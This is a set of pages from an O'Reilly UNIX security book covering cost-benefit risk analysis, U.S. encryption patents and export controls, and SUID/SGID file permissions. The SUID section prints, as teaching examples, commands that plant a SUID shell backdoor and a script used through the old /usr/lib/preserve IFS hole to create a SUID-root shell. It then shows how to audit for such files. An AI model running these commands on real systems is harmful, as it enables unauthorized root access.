files to user root and export read-only.<br />

Shutting off power to the computer Put the computer in a physically secure location. Put a<br />

lock on circuit-breaker boxes, or place them in locked<br />

rooms. (However, be sure to check the National<br />

Electric Code <strong>Sec</strong>tion 100 regarding the accessibility<br />

of emergency shutoffs. Remember that a computer<br />

that is experiencing an electrical fire is not very<br />

secure.)<br />

Cutting network or terminal cables Run cables and wires through conduits to their<br />

destinations. Restrict access to rooms where the wires<br />

are exposed<br />

24.7 Damage Control 25.2 Overload Attacks<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch25_01.htm (2 of 2) [2002-04-12 10:45:23]


[Chapter 2] 2.3 Cost-Benefit Analysis<br />

Chapter 2<br />

Policies and Guidelines<br />

2.3 Cost-Benefit Analysis<br />

After you complete your risk assessment, you need to assign a cost to each risk, and determine the cost of<br />

defending against it. This is called a cost-benefit analysis.<br />

2.3.1 The Cost of Loss<br />

Computing costs can be very difficult. A simple cost calculation can simply take into account the cost of<br />

repairing or replacing a particular item. A more sophisticated cost calculation can consider the cost of<br />

having equipment out of service, the cost of added training, the cost of additional procedures resulting<br />

from a loss, the cost to a company's reputation, and even the cost to a company's clients. Generally<br />

speaking, including more factors in your cost calculation will increase your effort, but will also increase<br />

the accuracy of your calculations.<br />

For most purposes, you do not need to assign an exact value to each possible risk. Normally, assigning a<br />

cost range to each item is sufficient. For instance, the loss of a dozen blank diskettes may be classed as<br />

"under $500," while a destructive fire in your computer room might be classed as "over $1,000,000."<br />

Some items may actually fall into the category "irreparable/irreplaceable;" this could include loss of your<br />

entire accounts-due database, or the death of a key employee.<br />

You may want to assign these costs based on a finer scale of loss than simply "lost/not lost." For<br />

instance, you might want to assign separate costs for each of the following categories (these are not in<br />

rank order):<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Non-availability over a short term (< 7-10 days)<br />

Non-availability over a medium term (1-2 weeks)<br />

Non-availability over a long term (more than 2 weeks)<br />

Permanent loss or destruction<br />

Accidental partial loss or damage<br />

Deliberate partial loss or damage<br />

Unauthorized disclosure within the organization<br />

Unauthorized disclosure to some outsiders<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch02_03.htm (1 of 4) [2002-04-12 10:45:23]


[Chapter 2] 2.3 Cost-Benefit Analysis<br />

●<br />

●<br />

Unauthorized full disclosure to outsiders, competitors, and the press<br />

Replacement or recovery cost<br />

2.3.2 The Cost of Prevention<br />

Finally, you need to calculate the cost of preventing each kind of loss.<br />

For instance, the cost to recover from a momentary power failure is probably only that of personnel<br />

"downtime" and the time necessary to reboot. However, the cost of prevention may be that of buying and<br />

installing a UPS system.<br />

Costs need to be amortized over the expected lifetime of your approaches, as appropriate. Deriving these<br />

costs may reveal secondary costs and credits that should also be factored in. For instance, installing a<br />

better fire-suppression system may result in a yearly decrease in your fire insurance premiums and give<br />

you a tax benefit for capital depreciation. But spending money on a fire-suppression system means that<br />

the money is not available for other purposes, such as increased employee training, or even investing.t<br />

Cost-Benefit Examples<br />

For example, suppose you have a 0.5% chance of a single power outage lasting more than a few seconds<br />

in any given year. The expected loss as a result of personnel not being able to work is $25,000, and the<br />

cost of recovery (handling reboots and disk checks) is expected to be another $10,000 in downtime and<br />

personnel costs. Thus, the expected loss and recovery cost per year is (25000+10000) x .005 = $175. If<br />

the cost of a UPS system that can handle all your needs is $150,000 and it has an expected lifetime of ten<br />

years, then the cost of avoidance is $15,000 per year. Clearly, investing in a UPS system at this location<br />

is not cost-effective.<br />

As another example, suppose that compromise of a password by any employee could result in an outsider<br />

gaining access to trade secret information worth $1,000,000. There is no recovery possible, because the<br />

trade secret status would be compromised, and once lost cannot be regained. You have 50 employees<br />

who access your network while traveling, and the probability of any one of them accidentally disclosing<br />

the password (for example, having it "sniffed" over the <strong>Internet</strong>; see Chapter 8, Defending Your<br />

Accounts) is 2%. Thus, the probability of at least one password being disclosed during the year is<br />

63.6%.[4] The expected loss is (1000000+0) x .636 = $636,000. If the cost of avoidance is buying a $75<br />

one-time password card for each user (see Chapter 8), plus a $20,000 software cost, and the system is<br />

good for five years, then the avoidance cost is (50*75 + 20000) / 5 = $4750 per year. Buying such a<br />

system would clearly be indicated.<br />

[4] That is, 1- (1.0-0.02)50<br />

2.3.3 Adding Up the Numbers<br />

At the conclusion of this exercise, you should have a multi-dimensional matrix consisting of assets, risks,<br />

and possible losses. For each loss, you should know its probability, the predicted loss, and the amount of<br />

money required to defend against the loss. If you are very precise, you will also have a probability that<br />

your defense will prove inadequate.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch02_03.htm (2 of 4) [2002-04-12 10:45:23]


[Chapter 2] 2.3 Cost-Benefit Analysis<br />

The process of determining if each defense should or should not be employed is now straightforward.<br />

You do this by multiplying each expected loss by the probability of its occurring as a result of each<br />

threat. Sort these in descending order, and compare each cost of occurrence to its cost of defense.<br />

This comparison results in a prioritized list of things you should address. The list may be surprising.<br />

Your goal should be to avoid expensive, probable losses, before worrying about less likely, low-damage<br />

threats. In many environments, fire and loss of key personnel are much more likely to occur and more<br />

damaging than a virus or break-in over the network. Surprisingly, however, it is break-ins and viruses<br />

that seem to occupy the attention and budget of most managers. This practice is simply not cost effective,<br />

nor does it provide the highest levels of trust in your overall system.<br />

To figure out what you should do, take the figures that you have gathered for avoidance and recovery to<br />

determine how best to address your high-priority items. The way to do this is to add the cost of recovery<br />

to the expected average loss, and multiply that by the probability of occurrence. Then, compare the final<br />

product with the yearly cost of avoidance. If the cost of avoidance is lower than the risk you are<br />

defending against, you would be advised to invest in the avoidance strategy if you have sufficient<br />

financial resources. If the cost of avoidance is higher than the risk that you are defending against, then<br />

consider doing nothing until after other threats have been dealt with.[5]<br />

[5] Alternatively, you may wish to reconsider your costs.<br />

Risk Cannot Be Eliminated<br />

You can identify and reduce risks, but you can never eliminate risk entirely.<br />

For example, you may purchase a UPS to reduce the risk of a power failure damaging your data. But the<br />

UPS may fail when you need it. The power interruption may outlast your battery capacity. The cleaning<br />

crew may have unplugged it last week to use the outlet for their floor polisher.<br />

A careful risk assessment will identify these secondary risks and help you to plan for them as well. You<br />

might, for instance, purchase a second UPS. But, of course, both of those units could fail at the same<br />

time. There might even be an interaction between the two units that you did not foresee when you<br />

installed them. The likelihood of a power failure gets smaller and smaller as you buy more backup power<br />

supplies and test the system, but it never becomes zero.<br />

Risk assessment can help you to protect yourself and your organization against human risks as well as<br />

natural ones. For example, you can use risk assessment to help protect yourself against computer<br />

break-ins, by identifying the risks and planning accordingly. But, as with power failures, you cannot<br />

completely eliminate the chance of someone breaking in to your computer.<br />

This fact is fundamental to computer security: No matter how secure you make a computer, it can always<br />

be broken into given sufficient resources, time, motivation, and money.<br />

Even systems that are certified according to the Department of Defense's " Orange Book" are vulnerable<br />

to break-ins. One reason is that these systems are sometimes not administered correctly. Another reason<br />

is that some people using them may be willing to take bribes to violate the security. Computer access<br />

controls do no good if they're not administered properly, exactly as the lock on a building will do no<br />

good if it is the night watchman who is stealing office equipment at 2 a.m.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch02_03.htm (3 of 4) [2002-04-12 10:45:23]


[Chapter 2] 2.3 Cost-Benefit Analysis<br />

Indeed, people are often the weakest link in a security system. The most secure computer system in the<br />

world is wide open if the system administrator cooperates with those who wish to break into the machine.<br />

People can be compromised with money, threats, or ideological appeals. People can also make mistakes -<br />

like accidentally sending email containing account passwords to the wrong person.<br />

Indeed, people are usually cheaper and easier to compromise than advanced technological safeguards.<br />

2.3.4 Convincing Management<br />

<strong>Sec</strong>urity is not free. The more elaborate your security measures become, the more expensive they<br />

become. Systems that are more secure may also be more difficult to use, although this need not always be<br />

the case.[6] <strong>Sec</strong>urity can also get in the way of "power users," who wish to exercise many difficult and<br />

sometimes dangerous operations without authentication or accountability. Some of these power users can<br />

be politically powerful within your organization.<br />

[6] The converse is also not true. PC operating systems are not secure, even though some are<br />

difficult to use.<br />

After you have completed your risk assessment and cost-benefit analysis, you will need to convince your<br />

organization's management of the need to act upon the information. Normally, you would formulate a<br />

policy that is then officially adopted. Frequently, this process is an uphill battle. Fortunately, it does not<br />

have to be.<br />

The goal of risk assessment and cost-benefit analysis is to prioritize your actions and spending on<br />

security. If your business plan is such that you should not have an uninsured risk of more than $10,000<br />

per year, you can use your risk analysis to determine what needs to be spent to achieve this goal. Your<br />

analysis can also be a guide as to what to do first, then second, and can identify which things you should<br />

relegate to later years.<br />

Another benefit of risk assessment is that it helps to justify to management that you need additional<br />

resources for security. Most managers and directors know little about computers, but they do understand<br />

risk and cost/benefit analyses.[7] If you can show that your organization is currently facing an exposure<br />

to risk that could total $20,000,000 per year (add up all the expected losses plus recovery costs for what<br />

is currently in place), then this estimate might help convince management to fund some additional<br />

personnel and resources.<br />

[7] In like manner, few computer security personnel seem to understand risk analysis<br />

techniques.<br />

On the other hand, going to management with a vague "We're really likely to see several break-ins on the<br />

<strong>Internet</strong> after the next CERT announcement" is unlikely to produce anything other than a mild concern<br />

(if that).<br />

2.2 Risk Assessment 2.4 Policy<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch02_03.htm (4 of 4) [2002-04-12 10:45:23]


[Chapter 6] 6.7 Encryption and U.S. Law<br />

Chapter 6<br />

Cryptography<br />

6.7 Encryption and U.S. Law<br />

Encryption is subject to the law in the United States for two reasons: public key cryptography is subject<br />

to several patents in the United States; and U.S. law currently classifies cryptography as munitions, and<br />

as such, regulates it with export control restrictions.<br />

While these restrictions have hampered the widespread use of cryptography within the United States,<br />

they have done little to limit the use of cryptography abroad, one of the putative goals of the export<br />

control restrictions.<br />

6.7.1 Cryptography and the U.S. Patent System<br />

Patents applied to computer programs, frequently called software patents, are the subject of ongoing<br />

controversy in the computer industry and in parts of Congress. As the number of software patents issued<br />

has steadily grown each year, the U.S. Patent and Trademark Office has come under increasing attack for<br />

granting too many patents which are apparently neither new nor novel. There is also some underlying<br />

uncertainty whether patents on software are Constitutional, but no case has yet been tried in an<br />

appropriate court to definitively settle the matter.<br />

Some of the earliest and most important software patents granted in the United States were in the field of<br />

public key cryptography. In particular, Stanford University was awarded two fundamental patents on the<br />

knapsack and Diffie-Hellman encryption systems, and MIT was awarded a patent on the RSA algorithm.<br />

Table 6.4 summarizes the various patents that have been awarded on public key cryptography.<br />

Between 1989 and 1995, all of these patents were exclusively licensed to Public Key Partners, a small<br />

company based in Redwood City, California. As this book went to press, the partnership was dissolved,<br />

and the patents have apparently reverted to the partners, Cylink, Inc., of Sunnyvale, Calif., and RSA Data<br />

<strong>Sec</strong>urity of Redwood City, Calif. Exactly what this change in status means for people wishing to practice<br />

the inventions has not yet been determined.<br />

6.7.2 Cryptography and Export Controls<br />

Under current U.S. law, cryptography is a munition, akin to nuclear materials and biological warfare<br />

agents. Thus, export of cryptographic machines (such as computer programs that implement<br />

cryptography) is covered by the Defense Trade Regulations (formerly known as the International Traffic<br />

in Arms Regulation - ITAR). To export a program in machine-readable format that implements<br />

cryptography, you need a license from the Office of Defense Trade Controls (DTC) inside the U.S. State<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_07.htm (1 of 3) [2002-04-12 10:45:23]


[Chapter 6] 6.7 Encryption and U.S. Law<br />

Department; publishing the same algorithm in a book or public paper is not controlled.<br />

To get a license to export a program, you disclose the program to DTC, which then makes an evaluation.<br />

(In practice, these decisions are actually made by the National <strong>Sec</strong>urity Agency.) Historically, programs<br />

that implement sufficiently weak cryptography are allowed to be exported; those with strong<br />

cryptography, such as DES, are denied export licenses.<br />

A 1993 survey by the Software Publisher's Association, a U.S.-based industry advocacy group, found<br />

that encryption is widely available in overseas computer products and that availability is growing. They<br />

noted the existence of more than 250 products distributed overseas containing cryptography. Many of<br />

these products use technologies that are patented in the U.S. (At the time, you could literally buy<br />

high-quality programs that implement RSA encryption on the streets of Moscow, although Russia has<br />

since enacted stringent restrictions on the sale of cryptographic programs.)<br />

Table 6.4: The Public Key Cryptography Patents<br />

Patent # Title Covers Inventors Assignee Date Date Date<br />

Invention<br />

Filed Granted Expires<br />

4,200,770 Cryptographic Diffie-Hellman Martin E. Stanford September April 29, April 29,<br />

Apparatus and key exchange Hellman, University 6, 1977 1980 1997<br />

Method<br />

Bailey W.<br />

Diffie,<br />

Ralph C.<br />

Merkle,<br />

4,218,582 Public Key Knapsack, and Martin E. Stanford October 6, August August<br />

Cryptographic possibly all of Hellman, University 1977 19, 1980 19, 1997<br />

Apparatus and public key Ralph C.<br />

Method cryptography Merkle<br />

4,424,414 Exponentiation<br />

Martin E. Stanford May 1, January 3, January 3,<br />

Cryptographic<br />

Hellman, University 1978 1984 2001<br />

Apparatus and<br />

Stephen<br />

Method<br />

C. Pohlig<br />

4,405,829 Cryptographic RSA Ronald L. Massachusetts December September September<br />

Communications encryption Rivest, Institute of 14, 1977 20, 1983 20, 2000<br />

System and<br />

Adi Technology<br />

Method<br />

Shamir,<br />

Leonard<br />

M.<br />

Adleman<br />

Most European countries used to have regulations regarding software similar to those in force in the U.S.<br />

Many were discarded in the early 1990s in favor of a more liberal policy, which allows mass-market<br />

software to be freely traded.<br />

In 1992, the Software Publishers Association and the State Department reached an agreement which<br />

allows the export of programs containing RSA Data <strong>Sec</strong>urity's RC2 and RC4 algorithms, but only when<br />

the key size is set to 40 bits or less. 40 bits is not very secure, and application of a distributed attack using<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_07.htm (2 of 3) [2002-04-12 10:45:23]


[Chapter 6] 6.7 Encryption and U.S. Law<br />

standard workstations in a good-size lab can break these in at most a few days. This theory was<br />

demonstrated quite visibly in mid-1995 when two independent groups broke 40-bit keys used in the<br />

export version of the Netscape browser. Although the effort took many machines and days of effort, both<br />

were accomplished in fairly standard research environments similar to many others around the world.<br />

Canada is an interesting case in the field of export control. Under current U.S. policy, any cryptographic<br />

software can be directly exported to Canada without the need of an export license. Canada has also<br />

liberalized its export policy, allowing any Canadian-made cryptographic software to be further exported<br />

abroad. But software that is exported to Canada cannot then be exported to a third country, thanks to<br />

Canada's Rule #5100, which honors U.S. export prohibitions on "all goods originating in the United<br />

States" unless they have been "further processed or manufactured outside the United States so as to result<br />

in a substantial change in value, form, or use of the goods or in the production of new goods."<br />

Several companies are now avoiding the hassle of export controls by doing their software engineering<br />

overseas, and then importing the products back into the United States. We feel that current regulations<br />

only serve to hobble U.S. industry, and only play a minor role in slowing the spread of encryption use<br />

worldwide.<br />

6.6 Encryption Programs<br />

Available for <strong>UNIX</strong><br />

III. System <strong>Sec</strong>urity<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_07.htm (3 of 3) [2002-04-12 10:45:23]


[Chapter 5] 5.5 SUID<br />

5.5 SUID<br />

Chapter 5<br />

The <strong>UNIX</strong> Filesystem<br />

Sometimes, unprivileged users must be able to accomplish tasks that require privileges. An example is the passwd program,<br />

which allows you to change your password. Changing a user's password requires modifying the password field in the<br />

/etc/passwd file. However, you should not give a user access to change this file directly - the user could change everybody<br />

else's password as well! Likewise, the mail program requires that you be able to insert a message into the mailbox of another<br />

user, yet you should not to give one user unrestricted access to another's mailbox.<br />

To get around these problems, <strong>UNIX</strong> allows programs to be endowed with privilege. Processes executing these programs<br />

can assume another UID or GID when they're running. A program that changes its UID is called a SUID program (set-UID);<br />

a program that changes its GID is called a SGID program (set-GID). A program can be both SUID and SGID at the same<br />

time.<br />

When a SUID program is run, its effective UID[22] becomes that of the owner of the file, rather than of the user who is<br />

running it. This concept is so clever that AT&T patented it.[23]<br />

[22] We explained effective UID in "Real and Effective UIDs" in Chapter 4, Users, Groups, and the Superuser.<br />

[23] However, the patent has since been released into the public domain, as should all software patents, if<br />

software patents should be allowed at all.<br />

5.5.1 SUID, SGID, and Sticky Bits<br />

If a program is SUID or SGID, the output of the ls -l command will have the x in the display changed to an s. If the program<br />

is sticky, the last x changes to a t as shown in Table 5.13 and Figure 5.3.<br />

Figure 5.3: Additional file permissions<br />

Table 5.13: SUID, SGID, and Sticky Bits<br />

Contents Permission Meaning<br />

---s------ SUID A process that execs a SUID program has its effective UID set to be the UID of the program's owner.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_05.htm (1 of 7) [2002-04-12 10:45:24]


[Chapter 5] 5.5 SUID<br />

------s--- SGID A process that execs a SGID program has its effective GID changed to the program's GID. Files<br />

created by the process can have their primary group set to this GID as well, depending on the<br />

permissions of the directory in which the files are created. Under Berkeley-derived <strong>UNIX</strong>, a process<br />

that execs an SGID program also has the program's GID temporarily added to the process's list of<br />

GIDs. Solaris and other System V-derived versions of <strong>UNIX</strong> use the SGID bit on data files to enable<br />

mandatory file locking.<br />

---------t sticky This is obsolete with files, but is used for directories. See "The Origin of `Sticky' " sidebar later in<br />

this chapter.<br />

The Origin of "Sticky"<br />

A very long time ago, <strong>UNIX</strong> ran on machines with much less memory than today: 64 kilobytes, for instance. This amount of<br />

memory was expected to contain a copy of the operating system, I/O buffers, and running programs. This memory often<br />

wasn't sufficient when there were several large programs running at the same time.<br />

To make the most of the limited memory, <strong>UNIX</strong> swapped processes to and from secondary storage as their turns at the CPU<br />

ended. When a program was started, <strong>UNIX</strong> would determine the amount of storage that might ultimately be needed for the<br />

program, its stack, and all its data. It then allocated a set of blocks on the swap partition of the disk or drum attached to the<br />

system. (Many systems still have a /dev/swap, or a swapper process that is a holdover from these times.)<br />

Each time the process got a turn from the scheduler, <strong>UNIX</strong> would swap in the program and data, if needed, execute for a<br />

while, and then swap out the memory copy if the space was needed for the next process. When the process exited or exec'd<br />

another program, the swap space was reclaimed for use elsewhere. If there was not enough swap space to hold the process's<br />

memory image, the user got a "No memory error " (still possible on many versions of <strong>UNIX</strong> if a large stack or heap is<br />

involved.)<br />

Obviously, this is a great deal of I/O traffic that could slow computation. So, one of the eventual steps was development of<br />

compiler technology that constructed executable files with two parts: pure code that would not change, and everything else.<br />

These were indicated with a special magic number in the header inside the file. When the program was first executed, the<br />

program and data were copied to their swap space on disk first, then brought into memory to execute. However, when the<br />

time comes to swap out, the code portions were not written to disk - they would not have changed from what was already<br />

on disk! This change was a big savings.<br />

The next obvious step was to stop some of that extra disk-to-disk copying at start-up time. Programs that were run<br />

frequently - such as cc, ed, and rogue - could share the same program pages. Furthermore, even if no copy was currently<br />

running, we could expect another one to be run soon. Therefore, keeping the pages in memory and on the swap partition,<br />

even while we weren't using them, made sense. The "sticky bit" was added to mark those programs as worth saving.<br />

Since those times, larger memories and better memory management methods have largely removed the original need for the<br />

sticky bit.<br />

In each of the cases above, the designator letter is capitalized if the bit is set, and the corresponding execute bit is not set.<br />

Thus, a file that has its sticky and SGID bits set, and is otherwise mode 444, would appear in an ls listing as<br />

% ls -l /tmp/example<br />

-r--r-Sr-T 1 root user 12324 Mar 26 1995 /tmp/example<br />

An example of a SUID program is the su command, introduced in Chapter 4:<br />

% ls -l /bin/su<br />

-rwsr-xr-x 1 root user 16384 Sep 3 1989 /bin/su<br />

%<br />

5.5.2 Problems with SUID<br />

Any program can be SUID, SGID, or both SUID and SGID. Because this feature is so general, SUID/SGID can open up<br />

some interesting security problems.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_05.htm (2 of 7) [2002-04-12 10:45:24]


[Chapter 5] 5.5 SUID<br />

For example, any user can become the superuser simply by running a SUID copy of csh that is owned by root. Fortunately,<br />

you must be root already to create a SUID version of csh that is owned by root. Thus, an important objective in running a<br />

secure <strong>UNIX</strong> computer is to ensure that somebody who has superuser privileges will not leave a SUID csh on the system,<br />

directly or indirectly.<br />

If you leave your terminal unattended, an unscrupulous passerby can destroy the security of your account simply by typing<br />

the commands:<br />

% cp /bin/sh /tmp/break-acct<br />

% chmod 4755 /tmp/break-acct<br />

%<br />

These commands create a SUID version of the sh program. Whenever the attacker runs this program, the attacker becomes<br />

you - with full access to all of your files and privileges. The attacker might even copy this SUID program into a hidden<br />

directory so that it would only be found if the superuser scanned the entire disk for SUID programs. Not all system<br />

administrators do such scanning on any regular basis.<br />

Note that the program copied need not be a shell. Someone with malicious intent can cause you misery by creating a SUID<br />

version of other programs. For instance, consider a SUID version of the editor program. With it, not only can he read or<br />

change any of your files, but he can also spawn a shell running under your UID.<br />

Most SUID system programs are SUID root; that is, they become the superuser when they're executing. In theory, this<br />

aspect is not a security hole, because a compiled program can perform only the function or functions that were compiled into<br />

it. (That is, you can change your password with the passwd program, but you cannot alter the program to change somebody<br />

else's password.) But many security holes have been discovered by people who figured out ways of making a SUID program<br />

do something that it was not designed to do. In many circumstances, programs that are SUID root could easily have been<br />

designed to be SUID something else (such as daemon, or some UID created especially for the purpose). Too often, SUID<br />

root is used when something with less privilege would be sufficient.<br />

In Chapter 23, Writing <strong>Sec</strong>ure SUID and Network Programs, we provide some suggestions on how to write more secure<br />

programs in <strong>UNIX</strong>. If you absolutely must write a SUID or SGID program (and we advise you not to), then consult that<br />

chapter first.<br />

5.5.3 SUID Shell Scripts<br />

Under most versions of <strong>UNIX</strong>, you can create shell scripts[24] that are SUID or SGID. That is, you can create a shell script<br />

and, by setting the shell script's owner to be root and setting its SUID bit, you can force the shell script to execute with<br />

superuser privileges.<br />

[24] Actually, any interpreted scripts.<br />

You should never write SUID shell scripts.<br />

Because of a fundamental flaw with the <strong>UNIX</strong> implementation of shell scripts and SUID, you cannot execute SUID shell<br />

scripts in a completely secure manner on systems that do not support the /dev/fd device. This flaw arises because executing a<br />

shell script under <strong>UNIX</strong> involves a two-step process: when the kernel determines that a shell script is about to be run, it first<br />

starts up a SUID copy of the shell interpreter, then the shell interpreter begins executing the shell script. Because these two<br />

operations are performed in two discrete steps, you can interrupt the kernel after the first step and switch the file that the<br />

shell interpreter is about to execute. In this fashion, an attacker could get the computer to execute any shell script of his or<br />

her choosing, which essentially gives the attacker superuser privileges. Although this flaw is somewhat mitigated by the<br />

/dev/fd device, even on systems that do support a /dev/fd device, SUID shell scripts are very dangerous and should be<br />

avoided.<br />

Some modern <strong>UNIX</strong> systems ignore the SUID and SGID bits on shell scripts for this reason. Unfortunately, many do not.<br />

Instead of writing SUID shell scripts, we suggest that you use the Perl programming language for these kinds of tasks. A<br />

version of Perl called taintperl [25] will force you to write SUID scripts that check their PATH environment variable and<br />

that do not use values supplied by users for parameters such as filenames unless they have been explicitly "untainted." Perl<br />

has many other advantages for system administration work as well. We describe some of them in Chapter 23. You can also<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_05.htm (3 of 7) [2002-04-12 10:45:24]


[Chapter 5] 5.5 SUID<br />

learn more about Perl from the excellent <strong>O'Reilly</strong> book, Programming Perl, by Larry Wall and Randal L. Schwartz.<br />

[25] In release 5 of Perl, this option is replaced by the -T option to Perl.<br />

5.5.3.1 write: Example of a possible SUID/SGID security hole<br />

The authors of SUID and SGID programs try to ensure that their software won't create security holes. Sometimes, however,<br />

a SUID or SGID program can create a security hole if the program isn't installed in the way the program author planned.<br />

For example, the write program, which prints a message on another user's terminal, is SGID tty. For security reasons, <strong>UNIX</strong><br />

doesn't normally let users read or write information to another's terminal; if it did, you could write a program to read another<br />

user's keystrokes, capturing any password that she might type. To let the write program function, every user's terminal is<br />

also set to be writable by the tty group. Because write is SGID tty, the write program lets one user write onto another user's<br />

terminal. It first prints a message that tells the recipient the name of the user who is writing onto her terminal.<br />

But write has a potential security hole - its shell escape. By beginning a line with an exclamation mark, the person using the<br />

write program can cause arbitrary programs to be run by the shell. (The shell escape is left over from the days before <strong>UNIX</strong><br />

had job control. The shell escape made it possible to run another command while you were engaged in a conversation with a<br />

person on the computer using write.) Thus, write must give up its special privileges before it invokes a shell; otherwise, the<br />

shell (and any program the user might run) would inherit those privileges as well.<br />

The part of the write program that specifically takes away the tty group permission before the program starts up the shell<br />

looks like this:<br />

setgid(getgid()); /* Give up effective group privs */<br />

execl(getenv("SHELL"),"sh","-c",arg,0);<br />

Notice that write changes only its GID, not its effective UID. If write is installed SUID root instead of SGID tty, the<br />

program will appear to run properly but any program that the user runs with the shell escape will actually be run as the<br />

superuser! An attacker who has broken the security on your system once might change the file permissions of the write<br />

program, leaving a hole that he or she could exploit in the future. The program, of course, will still function as before.<br />

5.5.3.2 Another SUID example: IFS and the /usr/lib/preserve hole<br />

Sometimes, an interaction between a SUID program and a system program or library creates a security hole that's unknown<br />

to the author of the program. For this reason, it can be extremely difficult to know if a SUID program contains a security<br />

hole or not.<br />

One of the most famous examples of a security hole of this type existed for years in the program called /usr/lib/preserve<br />

(which is now given names similar to /usr/lib/ex3.5preserve). This program, which is used by the vi and ex editors,<br />

automatically makes a backup of the file being edited if the user is unexpectedly disconnected from the system before<br />

writing out changes to the file. The preserve program writes the changes to a temporary file in a special directory, then uses<br />

the /bin/mail program to send the user a notification that the file has been saved.<br />

Because people might be editing a file that was private or confidential, the directory used by the older version of the<br />

preserve program was not accessible by most users on the system. Therefore, to let the preserve program write into this<br />

directory, and let the recover program read from it, these programs were made SUID root.<br />

Three details of the /usr/lib/preserve implementation worked together to allow knowledgeable system crackers to use the<br />

program to gain root privileges:<br />

1.<br />

2.<br />

3.<br />

preserve was installed SUID root.<br />

preserve ran /bin/mail as the root user to alert users that their files had been preserved.<br />

preserve executed the mail program with the system() function call.<br />

The problem was that the system function uses sh to parse the string that it executes. There is a little-known shell variable<br />

called IFS, the internal field separator, which sh uses to figure out where the breaks are between words on each line that it<br />

parses. Normally, IFS is set to the white space characters: space, tab, and newline. But by setting IFS to the slash character<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_05.htm (4 of 7) [2002-04-12 10:45:24]


[Chapter 5] 5.5 SUID<br />

(/) then running vi, and then issuing the preserve command, it was possible to get /usr/lib/preserve to execute a program in<br />

the current directory called bin. This program was executed as root. (/bin/mail got parsed as bin with the argument mail.)<br />

If a user can convince the operating system to run a command as root, that user can become root. To see why this is so,<br />

imagine a simple shell script which might be called bin, and run through the hole described earlier:[26]<br />

[26] There is actually a small bug in this shell script; can you find it?<br />

#<br />

# Shell script to make an SUID-root shell<br />

#<br />

cd /homes/mydir/bin<br />

cp /bin/sh ./sh<br />

# Now do the damage!<br />

chown root sh<br />

chmod 4755 sh<br />

This shell script would get a copy of the Bourne shell program into the user's bin directory, and then make it SUID root.<br />

Indeed, this is the very way that the problem with /usr/lib/preserve was exploited by system crackers.<br />

The preserve program had more privilege than it needed - it violated a basic security principle called least privilege. Least<br />

privilege states that a program should have only the privileges it needs to perform the particular function it's supposed to<br />

perform, and no others. In this case, instead of being SUID root, /usr/lib/preserve should have been SGID preserve, where<br />

preserve would have been a specially created group for this purpose. Although this restriction would not have completely<br />

eliminated the security hole, it would have made its presence considerably less dangerous. Breaking into the preserve group<br />

would have only let the attacker view files that had been preserved.<br />

Although the preserve security hole was a part of <strong>UNIX</strong> since the addition of preserve to the vi editor, it wasn't widely<br />

known until 1986. For a variety of reasons, it wasn't fixed until a year after it was widely publicized.<br />

NOTE: If you are using an older version of <strong>UNIX</strong> that can't be upgraded, remove the SUID permission from<br />

/usr/lib/preserve to patch this security hole.<br />

Newer editions of <strong>UNIX</strong> sh ignore IFS if the shell is running as root or if the effective user ID differs from the real user ID.<br />

Many other shells have similarly been enhanced, but not all have. The idea that there are still programs being shipped by<br />

vendors in 1995 with this same IFS vulnerability inside is interesting and very depressing. The general problem has been<br />

known for over 10 years, and people are still making the same (dumb) mistakes.<br />

5.5.4 Finding All of the SUID and SGID Files<br />

You should know the names of all SUID and SGID files on your system. If you discover new SUID or SGID files,<br />

somebody might have created a trap door that they can use at some future time to gain superuser access. You can list all of<br />

the SUID and SGID files on your system with the command:<br />

# find / \(-perm -004000<br />

-o -perm -002000 \) -type f -print<br />

This find command starts in the root directory (/) and looks for all files that match mode 002000 (SGID) or mode 004000<br />

(SUID). The -type f option causes the search to be restricted to files. The -print option causes the name of every matching<br />

file to be printed.<br />

NOTE: If you are using NFS, you should execute find commands only on your file servers. You should further<br />

restrict the find command so that it does not try to search networked disks. Otherwise, use of this command<br />

may cause an excessive amount of NFS traffic on your network. To restrict your find command, use the<br />

following:<br />

# find / \( -local -o -prune \)<br />

\( -perm -004000 -o -perm -002000 \) -type f -print<br />

NOTE: Alternatively, if your find command has the -xdev option, you can use it to prevent find from crossing<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_05.htm (5 of 7) [2002-04-12 10:45:24]


[Chapter 5] 5.5 SUID<br />

filesystem boundaries. To search the entire filesystem using this option means running the command multiple<br />

times, once for each mounted partition.<br />

Be sure that you are the superuser when you run find, or you may miss SUID files hidden in protected directories.<br />

5.5.4.1 The ncheck command<br />

The ncheck command is an old <strong>UNIX</strong> command that prints a list of each file on your system and its corresponding inode<br />

number. When used with the -s option, ncheck restricts itself to listing all of the "special" inodes on your system - such as<br />

the devices and SUID files.<br />

The ncheck command runs on a filesystem-by-filesystem basis. For example:<br />

# ncheck -s | cat -ve -<br />

/dev/dsk/c0t3d0s0:<br />

125 /dev/fd/0<br />

513 /dev/fd/1<br />

